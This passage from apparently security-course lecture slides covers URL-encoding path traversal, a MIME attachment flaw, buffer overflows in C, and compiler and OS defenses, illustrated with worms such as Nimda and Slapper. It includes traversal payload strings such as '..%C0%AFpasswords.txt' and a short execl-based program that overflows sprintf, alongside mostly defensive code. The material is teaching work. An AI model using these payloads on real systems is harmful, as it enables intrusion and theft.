  - 8-11 bits: input xxxxxxxxxxx becomes 110xxxxx 10xxxxxx
  - 12-16 bits: input xxxx...xxxx becomes 1110xxxx 10xxxxxx 10xxxxxx
  - 17-21 bits: input xxxx...xxxxx becomes 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx


## URL Character Encoding
- It is easy enough for the server to spot `%2F` and recognize a forward slash, but the slash (0x2F) can also be encoded via the 8-11 bits format as `%C0%AF`, an *overlong* encoding:
  - http://domain.tld/user/..%C0%AFpasswords.txt
  - No longer looks like ../ is present, but it is!
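- The following sketch shows why the trick works and how a strict decoder stops it. The helpers are hypothetical. The naive decoder accepts `C0 AF` as `/`, while RFC 3629 forbids such overlong forms (lead bytes 0xC0 and 0xC1 never occur in valid UTF-8):
```c
#include <stdbool.h>

/* Naive decoder for a 2-byte UTF-8 sequence 110xxxxx 10xxxxxx:
 * concatenates the 5 + 6 payload bits without further checks. */
unsigned decode_2byte(unsigned char b0, unsigned char b1) {
    return ((unsigned)(b0 & 0x1F) << 6) | (b1 & 0x3F);
}

/* Strict check: the 2-byte form is only legal for code points
 * 0x80..0x7FF; anything smaller is an overlong encoding. */
bool valid_2byte(unsigned char b0, unsigned char b1) {
    if ((b0 & 0xE0) != 0xC0 || (b1 & 0xC0) != 0x80) return false;
    return decode_2byte(b0, b1) >= 0x80;
}
```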


## URL Character Encoding cont.
- Simple encoding problem was easily fixed in web servers, but multilevel encoding is possible:
  - `%255c` is not recognized as a backslash by the security checker
  - After one round of decoding, `%255c` becomes `%5c`, because `%25` is the code for the percent sign itself: `%25` decodes to `%`
- The checker only searched for `%5c` or `\`, so it would have flagged `%5c` only if that had been present initially


## URL Character Encoding cont.
- The server then performs one more round of decoding because it sees the `%` sign, and `%5c` becomes a backslash (a path separator in Windows path names)
- Because the encoded string has already passed the security checker, the web server serves the page (unfortunately!)
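- A minimal one-round `%XX` decoder, written as a hypothetical helper, shows the two rounds. `..%255c` decodes to `..%5c`, which the checker never saw in the original string, and decoding again yields `..\`:
```c
#include <ctype.h>
#include <stdlib.h>

/* One round of %XX decoding; out must hold strlen(in) + 1 bytes.
 * Malformed escapes (e.g. "%zz") are copied through unchanged. */
void percent_decode(const char *in, char *out) {
    while (*in) {
        if (in[0] == '%' && isxdigit((unsigned char)in[1])
                         && isxdigit((unsigned char)in[2])) {
            char hex[3] = { in[1], in[2], '\0' };
            *out++ = (char)strtol(hex, NULL, 16);
            in += 3;
        } else {
            *out++ = *in++;
        }
    }
    *out = '\0';
}
```
- A common defense is to decode exactly once and run the security check on the same decoded string that will be used to open the file.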


## URL Character Encoding cont.
- Web servers such as Microsoft IIS have been patched to fix this vulnerability
- Before the patch, the [W32/Nimda](https://www.symantec.com/security_response/writeup.jsp?docid=2001-091816-3508-99) worm used this trick to backtrack into the root directory and use cmd.exe to copy itself over the web to the server and execute itself.


## MIME Header Parsing
- An email can have embedded or attached MIME files
- Outlook and other email clients often use Internet Explorer to parse the MIME files
- A MIME file type can be associated with an application and passed automatically to it, e.g. audio/x-wav files can be associated in Windows with Windows Media Player, so such a file would be sent by Internet Explorer directly to its associated application


## MIME Header Parsing 
- Vulnerability: Internet Explorer (before being fixed; see [here](http://www.microsoft.com/technet/security/bulletin/MS01-020.mspx)) would determine that the attachment should be opened automatically by an application, but would then allow the file extension to take priority in determining what application to use


## MIME Header Parsing 
- Exploit: Make an attachment of MIME type audio/x-wav but make the file name be virus.exe. 
	- The MIME type causes Internet Explorer to make the decision to open it automatically (even though the Outlook email client might have settings that should prevent opening `*.exe` files). 
	- Then, the `*.exe` extension causes Internet Explorer to pass it to the OS to execute.
- Vulnerability fixed in 2001 (IE 5.x).
	- Not before [W32/Badtrans](https://www.symantec.com/security_response/writeup.jsp?docid=2001-112410-5327-99) and [W32/Klez](https://www.symantec.com/security_response/writeup.jsp?docid=2002-041714-3225-99) could exploit it.
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="miscvul"><textarea data-template>
# Miscellaneous Vulnerabilities
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Miscellaneous Vulnerabilities
- Mistakes by system administrators, users, bad default security levels in applications software or firewalls, etc., can all create vulnerabilities
- Most exploits (including all 3 generations) are referred to as *blended attacks*
  - Because there is always a mixture of an exploit and a particular type of malicious code
  - e.g. overflowing a buffer is an exploit, but depositing a virus and running it is the second stage of the blended attack
- We will review some non source code examples


## System Administration Vulnerabilities
- Failure to provide secure utilities
	- e.g. SSL/SSH remote login utilities were not commonly used a decade ago
- Loose file system access rights and user privilege levels
	- many users have no idea that everyone can read many of their files
	- or the setuid, setgid, and sticky bits (the leading 4th octal digit of `chmod` permissions)


## System Administration Vulnerabilities
- Errors in firewall configuration (Szor, sec. 14.3)
	- Allows attackers unauthorized access
	- Permits denial of service attacks to continue instead of excluding the flood of packets


## User Behavior Vulnerabilities
- Poor password selection
  - Too short; all alphabetic; common words
  - 1988 Morris worm used a list of only 432 common passwords, and succeeded in cracking many user accounts all over the internet
  - This was the main reason the worm spread more than the creator thought it would; he did not realize that password selection was that bad!
- Opening executable email attachments


## Vulnerabilities: Do We Ever Learn?
- All of these vulnerabilities have been known for years -- buffer overflows for over 40 years!
- Yet, the number of exploits is increasing
	- 323 buffer overflow vulnerabilities reported in 2004 to the national cyber-security vulnerability database (http://nvd.nist.gov/)
	- 331 buffer overflow vulnerabilities reported in just the first 6 months of 2005!
	- They don't bother to keep track anymore...


## Avoiding Vulnerabilities
- Good password selection
	- Many newer systems even allow pass phrases, i.e. multiple words with punctuation or blanks between
	- System should try its own dictionary attack and not permit you to choose a password that can be defeated
- Don't store a password unencrypted anywhere in a system, even in a temporary variable in a program
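- The following sketch shows a system running a tiny dictionary attack against a proposed password. The policy (minimum length plus a word list) and `password_acceptable()` are hypothetical:
```c
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

static bool equals_ignore_case(const char *a, const char *b) {
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
        a++; b++;
    }
    return *a == *b;   /* both strings must end together */
}

/* Rejects passwords shorter than min_len or found in dict */
bool password_acceptable(const char *pw, const char *const *dict,
                         size_t dict_len, size_t min_len) {
    if (strlen(pw) < min_len) return false;
    for (size_t i = 0; i < dict_len; i++)
        if (equals_ignore_case(pw, dict[i])) return false;
    return true;
}
```
- A real checker would use a large word list and also try common variations (capitalization, appended digits, letter substitutions).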


## Avoiding Vulnerabilities
- Don't open executable email attachments
- Review access permissions throughout your file directory structure
- Display and review your firewall settings
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="safeandunsafe"><textarea data-template>
# Safe and Unsafe Coding
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Avoiding Vulnerabilities
- Good coding style
  - Use only the good form of `printf()`; never use `printf(buffer)` for any function in the `printf()` family
  - Review loop bounds for off-by-one errors
  - Avoid unsafe C functions (e.g. `strcpy()`, `strcat()`, `sprintf()`, `gets()`, `scanf()`) and learn how to use alternatives (e.g. `strncpy()`, `strncat()`, `snprintf()`)
  - Insert bounds checking code


## Avoiding Vulnerabilities
- Good coding style, continued
  - Avoid unsafe programming languages (C, C++) and use more modern, safe languages wherever possible (Java, Ada, C# in managed mode)
- We will look at some coding style pointers from [Building Secure Software](https://www.amazon.com/Building-Secure-Software-Addison-Wesley-Professional/dp/0321774957) by Viega and McGraw


## Safe and Unsafe Coding
- Unsafe:
```
#include <stdio.h>
int main(void) {
    char buf[1024];
    gets(buf);  /* Won't stop at 1024 bytes (removed in C11) */
    return 0;
}
```
- Safe:
```
#include <stdio.h>
#define BUFSIZE 1024
int main(void) {
    char buf[BUFSIZE];
    fgets(buf, BUFSIZE, stdin);  /* Reads at most BUFSIZE - 1 chars */
    return 0;
}
```


## Safe and Unsafe Coding
- Unsafe:
```
strcpy(dst, src);  /* What prevents buffer overflow? */
```
- Safe:
```
#define DSTSIZE 1024
char dst[DSTSIZE];
/* ... */
/* Leave room for the null terminator: */
strncpy(dst, src, DSTSIZE - 1);
/* strncpy() does not terminate dst if src is too long, so: */
dst[DSTSIZE - 1] = '\0';
```
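

## Safe and Unsafe Coding: strncpy()
The two-step `strncpy()` idiom is easy to get wrong when repeated by hand, so one option is a small wrapper. `copy_string()` is a hypothetical name. It always terminates `dst` and also reports whether `src` had to be truncated.

```c
#include <stdbool.h>
#include <string.h>
/* Hypothetical wrapper around the strncpy() idiom.
   Always NUL-terminates; returns true if src was cut short. */
bool copy_string(char *dst, size_t dstsize, const char *src) {
    if (dstsize == 0)
        return true;                     /* nothing fits at all */
    strncpy(dst, src, dstsize - 1);      /* may leave dst unterminated... */
    dst[dstsize - 1] = '\0';             /* ...so terminate it here */
    return strlen(src) >= dstsize;
}
```

One design cost: `strncpy()` pads the rest of `dst` with NULs, which is wasted work for large buffers.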


## Safe and Unsafe Coding
- Unsafe:
```
strcpy(dst, src);  /* What prevents buffer overflow? */
```
- Safe:
```
/* Another way to fix the problem: size dst to fit src */
char *dst = malloc(strlen(src) + 1);  /* +1 for '\0' */
if (NULL == dst) {
    /* handle error here, abort */
}
strcpy(dst, src);
```
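

## Safe and Unsafe Coding: malloc() + strcpy()
The allocate-then-copy fix can be packaged as a function. `dup_string()` is a hypothetical name. POSIX `strdup()`, also standardized in C23, does the same job where it is available.

```c
#include <stdlib.h>
#include <string.h>
/* Hypothetical helper: dst is sized from src, so strcpy()
   cannot overflow it. The caller must free() the result. */
char *dup_string(const char *src) {
    char *dst = malloc(strlen(src) + 1);   /* +1 for '\0' */
    if (dst == NULL)
        return NULL;                       /* let the caller handle it */
    strcpy(dst, src);
    return dst;
}
```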


## Safe and Unsafe Coding
- Unsafe:
```
strcat(dst, src);
/* Enough room left in dst to concatenate src? */
```
- Safe:
```
strncat(dst, src, DSTSIZE - strlen(dst) - 1); 
```
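

## Safe and Unsafe Coding: strncat()
Here the safe call is wrapped in a hypothetical helper, with `DSTSIZE` assumed to be 16 so truncation is easy to see. `strncat()`'s limit counts the characters to append, not the total buffer size, and it always writes a `'\0'` after them. That is why both `strlen(dst)` and 1 are subtracted.

```c
#include <string.h>
#define DSTSIZE 16   /* assumed buffer size, small to show truncation */
/* Hypothetical helper: appends as much of src as fits. dst must
   already hold a NUL-terminated string in a DSTSIZE-byte buffer. */
void append_bounded(char *dst, const char *src) {
    strncat(dst, src, DSTSIZE - strlen(dst) - 1);
}
```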


## Safe and Unsafe Coding
- Unsafe:
```
int main(int argc, char *argv[]) {
    char usage[1024];
      /* Big enough for a valid file name ... right? */
    sprintf(usage, "USAGE: %s -f flag [arg1]\n", argv[0]);
    return 0;
}
```
- Safe:
```
#include <stdio.h>
int main(int argc, char *argv[]) {
    char usage[1024];
    const char *format_string = "USAGE: %s -f flag [arg1]\n";
    /* Writes at most sizeof usage bytes, including the '\0' */
    snprintf(usage, sizeof usage, format_string, argv[0]);
    return 0;
}
```
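

## Safe and Unsafe Coding: snprintf()
In C99, `snprintf()` returns the length the complete output *would* have had, so truncation can be detected and not just prevented. Some older implementations returned -1 instead, and the `n >= 0` test below treats that as failure too. `build_usage()` is a hypothetical name.

```c
#include <stdbool.h>
#include <stdio.h>
/* Builds the usage message; returns false if argv0 was so long
   that snprintf() had to truncate the output. */
bool build_usage(char *usage, size_t size, const char *argv0) {
    int n = snprintf(usage, size, "USAGE: %s -f flag [arg1]\n", argv0);
    return n >= 0 && (size_t) n < size;   /* n = untruncated length */
}
```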


## Safe and Unsafe Coding: sprintf()
- Vulnerability:
```
int main(int argc, char *argv[]) {
    char usage[1024];  /* Can this be overflowed? */
    sprintf(usage, "USAGE: %s -f flag [arg1]\n", argv[0]);
    // How long can a filename be, in argv[0]? What if the
    // filename is not a legitimate name from the OS? See
    // exploit below.
    return 0;
}
```


## Safe and Unsafe Coding: sprintf()
- Exploit:
```
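#include <string.h>
#include <unistd.h>
int main(void) {
    static char big[100000];            /* zero-filled */
    memset(big, 'A', sizeof big - 1);   /* very long string */
    execl("/path/to/above/program", big, (char *) NULL);
    // Starts program in 1st arg, passes 2nd arg
    // as argv[0] to that program. Bad news!
    return 1;  // only reached if execl() fails
}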
```


## Safe and Unsafe Coding: sprintf()
- Problem: `snprintf()` is not part of all C libraries (it was only standardized in C99)
- Solutions:
  - Package a working `snprintf()` with your software
  - Limit the length of the `%s` argument with a precision specifier in `sprintf()`:
```
sprintf(usage, "USAGE: %.1000s -f flag [arg1]\n",
        argv[0]);
```
- Unfortunately, support for the precision specifier in `%.1000s` is not consistent across all libraries, either
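

## Safe and Unsafe Coding: sprintf() Precision
A hard-coded `%.1000s` has to be kept in sync with the buffer size by hand. Below is a sketch that computes the precision instead and passes it through `%.*s`, which takes the precision from an `int` argument. It relies on the same precision support discussed above. `USAGE_SIZE` and `build_usage_precise()` are hypothetical.

```c
#include <stdio.h>
#include <string.h>
#define USAGE_SIZE 64   /* assumed buffer size */
/* Hypothetical helper: the fixed parts of the message are known,
   so the room left for argv0 is computed from the buffer size. */
void build_usage_precise(char usage[USAGE_SIZE], const char *argv0) {
    const char *head = "USAGE: ";
    const char *tail = " -f flag [arg1]\n";
    int room = USAGE_SIZE - (int) strlen(head) - (int) strlen(tail) - 1;
    sprintf(usage, "%s%.*s%s", head, room, argv0, tail);
}
```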


## Safe and Unsafe Coding
- Unsafe:
```
#include <stdio.h>
int main(int argc, char *argv[]) {
    char buf[256];
    sscanf(argv[0], "%s", buf);  // Won't stop at 256 bytes
    return 0;
}
```
- Safe:
```
#include <stdio.h>
int main(int argc, char *argv[]) {
    char buf[256];
    sscanf(argv[0], "%255s", buf); // Width limit: 255 chars + '\0'
    return 0;
}
```
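

## Safe and Unsafe Coding: sscanf() Widths
The width in `"%255s"` can drift out of sync with the buffer size. One common approach, sketched here, builds the format string from the same macro with preprocessor stringification. `BUFLEN`, `STR`, `XSTR`, and `read_word()` are hypothetical names.

```c
#include <stdio.h>
#define BUFLEN 255            /* max chars, excluding the '\0' */
#define STR(x)  #x
#define XSTR(x) STR(x)        /* expand BUFLEN before stringifying */
/* Uses the format "%255s", built from BUFLEN at compile time */
int read_word(const char *src, char buf[BUFLEN + 1]) {
    return sscanf(src, "%" XSTR(BUFLEN) "s", buf);
}
```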


## Safe and Unsafe Coding
- Each of these examples applies to a family of library functions
- For example, `scanf()`, `sscanf()`, `fscanf()`, and `vfscanf()` all have the same coding vulnerabilities
- The safe style shown in our examples can be easily adapted to other members of the same family
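

## Safe and Unsafe Coding: vsnprintf()
The same size discipline carries over to the `v` variants. Here is a sketch of a hypothetical `format_msg()` helper that forwards its arguments to `vsnprintf()`, so callers get `printf()`-style formatting with a hard size limit.

```c
#include <stdarg.h>
#include <stdio.h>
/* Bounded printf-style formatter; fmt must be a literal
   supplied by the programmer, never by the user. */
int format_msg(char *out, size_t size, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, size, fmt, ap);
    va_end(ap);
    return n;          /* n >= size means the output was truncated */
}
```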
	  </textarea></section>

	</section>
      
	<section>
      
	  <section data-markdown id="defenses"><textarea data-template>
# Defenses
	  </textarea></section>
	  
	  <section data-markdown data-separator="^\n$"><textarea data-template>
## Compiler-Based Prevention
- One approach: Modify the C language itself with a new compiler and runtime library, as in the [Cyclone variant of C](http://www.research.att.com/projects/cyclone/)
  - Overhead for bounds checking, garbage collection, library safeguards, etc., ranges from negligible to >100% for the worst cases
- Another approach: leave the language alone, but modify the compiler to emit stack and/or buffer overflow safeguards in the executable
	- Examples we will see: StackGuard, ProPolice, and StackShield


## StackGuard: Stack Canaries
- StackGuard inserts a marker between the saved frame pointer and the return address on the stack
	- The marker is called a *canary*, as in the "canary in a coal mine"
- If a buffer overflow overwrites the stack all the way to the return address, it will also overwrite the canary
- Before the function returns, the canary is checked; if it has been modified, the program is aborted instead of returning
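

## StackGuard: A Toy Canary Check
This is a toy model of the check, not StackGuard's generated code and not a real stack layout. One array holds an 8-byte buffer, a 4-byte canary, and a 4-byte fake return address, so the "overflow" stays well-defined C. `canary_intact_after_copy()` is a hypothetical name.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>
/* Toy frame layout: buffer | canary | fake return address */
enum { BUF = 8, CANARY = 4, RET = 4, FRAME = BUF + CANARY + RET };
static const unsigned char canary_value[CANARY] = { 0x00, 0x0d, 0x0a, 0xff };
/* True if the function may return normally; false means
   StackGuard-style code would abort instead of returning. */
bool canary_intact_after_copy(const unsigned char *input, size_t len) {
    unsigned char frame[FRAME] = { 0 };
    memcpy(frame + BUF, canary_value, CANARY);   /* prologue: place canary */
    if (len > FRAME)
        len = FRAME;                  /* keep the toy model in bounds */
    memcpy(frame, input, len);        /* copy with no check against BUF */
    return memcmp(frame + BUF, canary_value, CANARY) == 0;  /* epilogue */
}
```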


## Stack Canary Operation
<!-- .slide: class="max-image-height-300" -->
![canary stack](images/exploits/canary-stack.png)
- Overflowing `buffer[]` tramples on canary
- Does not prevent trashing the EBP, local function or file pointers, etc.
- Canary value: NUL-CR-LF-EOF; each byte terminates some family of string-handling functions, so a string-based overflow can hardly write it back out intact
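

## Terminator Canary: A Toy Model
This toy model (not a real stack) shows why the NUL-CR-LF-EOF value resists `strcpy()`-style overflows. To pass the check, the payload must put a 0x00 byte at the canary's position, and that is exactly where the copy stops. `string_overflow_succeeds()` is a hypothetical name.

```c
#include <stdbool.h>
#include <string.h>
/* Toy frame layout: buffer | terminator canary | fake return address */
enum { BUF = 8, CAN = 4, RET = 4, FRAME = BUF + CAN + RET };
/* Copies payload strcpy()-style (up to and including the first NUL).
   True only if the fake return address changed AND the canary still
   matches, i.e. the attack would go undetected. */
bool string_overflow_succeeds(const char *payload) {
    static const unsigned char canary[CAN] = { 0x00, 0x0d, 0x0a, 0xff };
    unsigned char frame[FRAME] = { 0 };
    memcpy(frame + BUF, canary, CAN);
    size_t n = strlen(payload) + 1;       /* strcpy copies the NUL too */
    if (n > FRAME)
        n = FRAME;                        /* keep the toy model in bounds */
    memcpy(frame, payload, n);
    bool ret_changed = false;
    for (size_t i = BUF + CAN; i < FRAME; i++)
        if (frame[i] != 0)
            ret_changed = true;
    return ret_changed && memcmp(frame + BUF, canary, CAN) == 0;
}
```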


## ProPolice: Better Stack Canaries and Frame Layout
- ProPolice (a.k.a. SSP, Stack-Smashing Protector) from IBM makes a couple of major improvements to StackGuard
	- Canary is placed below the saved EBP to protect it
	- The stack frame layout is rearranged so that non-array locals, such as function pointers and file pointers, are placed below arrays, so that overflowing the arrays cannot reach the pointers


## Stack Canary Limitations
- Stack canaries only guard against a *direct* attack on the stack, i.e. one that overwrites a contiguous run of stack memory starting from a neighboring buffer
- We saw that a format-string attack is *indirect*: it computes the location of the return address, then overwrites just that address and does not overflow from neighboring addresses
	- Hence, it does not overwrite a canary


## StackShield: Protecting Return Addresses
- StackShield is a Linux/gcc add-on that modifies the ASM output from gcc to maintain a separate data segment with return addresses
- Removing the return addresses from the data stack prevents both direct and indirect data attacks on the return address
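

## StackShield: A Toy Return Stack
This toy model shows the idea behind a separate return-address stack. It is not StackShield's implementation, which works by rewriting gcc's assembly output. The prologue saves a copy of the return address, and the epilogue compares the (possibly tampered) address from the data stack against it. A real scheme might simply restore the saved copy instead. All names are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#define MAX_DEPTH 64
static uintptr_t shadow[MAX_DEPTH];   /* separate return-address area */
static size_t depth;
/* Prologue: save a protected copy of the return address */
bool shadow_push(uintptr_t ret) {
    if (depth == MAX_DEPTH)
        return false;                 /* shadow stack full */
    shadow[depth++] = ret;
    return true;
}
/* Epilogue: true if the address on the data stack is still genuine */
bool shadow_check(uintptr_t ret_on_stack) {
    if (depth == 0)
        return false;                 /* return without a matching call */
    return shadow[--depth] == ret_on_stack;
}
```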


## StackShield: Protecting Return Addresses
- Also computes the range of valid code addresses and performs a range check on all function calls and returns
	- A call to, or return into, a data area will be detected as invalid because of the address range


## Operating System Defenses
- Don't allow execution in the stack
  - But an exploit could still execute code from the heap or another global data area
- Better: in addition to read and write permission bits on pages, add an execute permission bit and clear it on all data pages (heap, stack, etc.)
	- This is supported in hardware on x86-64 processors (the NX/XD bit) and by Microsoft Windows as DEP (from XP SP2 onward)


## Case Study: Slapper Worm
- The 2002 worm known as [Linux/Slapper](https://www.symantec.com/security_response/writeup.jsp?docid=2002-091311-5851-99) was a very complex attack on heap buffer overflow vulnerabilities within the Apache web server
- Vulnerability: In secure mode (i.e. on an https:// connection under SSL [Secure Sockets Layer]), Apache copied the client's master key into a fixed-length buffer `key_arg[]` that was just big enough to hold a valid 8-byte key
  - But it did no bounds checking, even though the client sends the key length along with the key
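

## Slapper: The Missing Check
Below is a sketch of the kind of bounds check that was missing. The `struct session`, `KEY_ARG_MAX`, and `store_key_arg()` names are hypothetical stand-ins, not the actual Apache/SSL code. The point is to compare the client-supplied length with the real buffer size before copying anything.

```c
#include <stdbool.h>
#include <string.h>
#define KEY_ARG_MAX 8               /* assumed size of the fixed buffer */
/* Hypothetical stand-in for the server's per-connection state */
struct session {
    unsigned char key_arg[KEY_ARG_MAX];
    unsigned int key_arg_length;
};
/* Copies the client's key only if its claimed length fits */
bool store_key_arg(struct session *s, const unsigned char *key, unsigned int len) {
    if (len > sizeof s->key_arg)
        return false;               /* reject instead of overflowing */
    memcpy(s->key_arg, key, len);
    s->key_arg_length = len;
    return true;
}
```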


## Case Study: Slapper Worm
- Exploit: Pass in a long key and key length, such that a certain magic address is overwritten


## Slapper: The Magic Address
- The magic address that Slapper wanted to overwrite was the GOT (Global Offset Table) entry for the `free()` function
	- GOT is the Unix/ELF equivalent of the IAT (Import Address Table) in a Windows PE file; Slapper is therefore an IAT-modifying EPO (entry-point obscuring) worm
	- I.e., if you redirect the GOT entry for `free()`, then calls that should have gone into `free()` in the C run-time library now go to a new address
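

## Slapper: A Toy GOT
This toy model shows why one overwritten GOT entry is enough. Calls to `free()` go indirectly through a writable function pointer that the dynamic linker fills in. Whoever can overwrite that pointer chooses what runs on the next call. All names here are hypothetical.

```c
#include <stddef.h>
/* Toy model of a single GOT entry for free() */
typedef void (*free_fn)(void *);
int legit_calls = 0, evil_calls = 0;
static void real_free(void *p) { (void) p; legit_calls++; }
static void injected(void *p)  { (void) p; evil_calls++; }
static free_fn got_free = real_free;      /* the "GOT entry" */
/* Program code calls free() only through the table */
void program_calls_free(void *p) { got_free(p); }
/* Stands in for Slapper's heap overflow reaching the entry */
void overwrite_got_entry(void) { got_free = injected; }
```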


## Slapper: The Magic Address
- The relative distance from the key_arg[] buffer to the GOT entry for `free()` differs among Apache revisions and among different Linux revisions for which Apache was compiled
- The Slapper author computed the addresses and distances across 23 (!) different combinations of Apache revision/Linux system


## Slapper: The Magic Address
- The first client message the worm sends is a request for Apache to identify its revision number and the Linux system version code (a legitimate request, as Apache services can depend on these numbers)
  - The exploit code was then tuned for the particular revision/system
-  Ultimately, Slapper ran its own shellcode on the server system, with Apache privileges, when Apache executed a call to `free()`
- See Szor, 10.4.4, for lots more details
	</textarea></section>

      </section>
      
    </div>
  </div>
  <script src="reveal.js/lib/js/head.min.js"></script> 
  <script src="reveal.js/js/reveal.js"></script>
  <script src="settings.js"></script> 
</body>
</html>